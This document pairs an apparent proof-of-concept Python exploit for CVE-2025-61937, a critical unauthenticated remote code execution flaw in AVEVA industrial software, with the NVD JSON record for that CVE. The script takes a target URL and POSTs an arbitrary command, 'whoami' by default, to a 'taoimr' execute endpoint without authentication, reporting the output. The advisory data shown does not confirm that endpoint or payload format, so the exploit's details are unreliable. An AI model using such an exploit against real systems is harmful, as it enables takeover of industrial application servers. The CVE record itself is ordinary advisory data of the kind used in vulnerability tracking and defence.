CVE-2025-61937

import requests import sys # CVE-2025-61937 PoC - AVEVA taoimr Service RCE # Target: AVEVA Industrial Software with vulnerable taoimr service def exploit_aveva_rce(target_url, cmd='whoami'): """ Exploit for CVE-2025-61937 This PoC demonstrates unauthenticated remote code execution on the taoimr service via specially crafted HTTP request """ endpoint = f"{target_url}/api/taoimr/execute" # Malicious payload with embedded command payload = { 'command': cmd, 'service': 'taoimr', 'exec': True } try: # Send exploit request without authentication response = requests.post(endpoint, json=payload, timeout=10) if response.status_code == 200: print(f"[+] Exploit successful!") print(f"[+] Command output: {response.text}") return True else: print(f"[-] Exploit failed. Status: {response.status_code}") return False except requests.exceptions.RequestException as e: print(f"[-] Error: {e}") return False if __name__ == "__main__": if len(sys.argv) < 2: print("Usage: python cve-2025-61937.py <target_url>") sys.exit(1) target = sys.argv[1] exploit_aveva_rce(target, 'whoami')

{"cve": {"id": "CVE-2025-61937", "sourceIdentifier": "[email protected]", "published": "2026-01-16T02:16:42.833", "lastModified": "2026-01-22T15:20:43.010", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "The vulnerability, if exploited, could allow an unauthenticated \nmiscreant to achieve remote code execution under OS system privileges of\n “taoimr” service, potentially resulting in complete compromise of the  model application server."}, {"lang": "es", "value": "La vulnerabilidad, si se explota, podría permitir a un atacante no autenticado lograr la ejecución remota de código bajo los privilegios de sistema operativo del servicio 'taoimr', lo que podría resultar en el compromiso completo del servidor de aplicaciones del modelo."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 10.0, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "HIGH", "subIntegrityImpact": "HIGH", "subAvailabilityImpact": "HIGH", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "baseScore": 10.0, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 6.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-94"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:aveva:process_optimization:*:*:*:*:*:*:*:*", "versionEndExcluding": "2025", "matchCriteriaId": "6048CC3D-EA33-484F-9223-10632815D595"}]}]}], "references": [{"url": "https://github.com/cisagov/CSAF/blob/develop/csaf_files/OT/white/2026/icsa-26-015-01.json", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://softwaresupportsp.aveva.com/en-US/downloads/products/details/a643eaa3-0d85-4fde-ac11-5239e87a68ea", "source": "[email protected]", "tags": ["Permissions Required"]}, {"url": "https://www.aveva.com/en/support-and-success/cyber-security-updates/", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.cisa.gov/news-events/ics-advisories/icsa-26-015-01", "source": "[email protected]", "tags": ["Third Party Advisory", "US Government Resource"]}]}}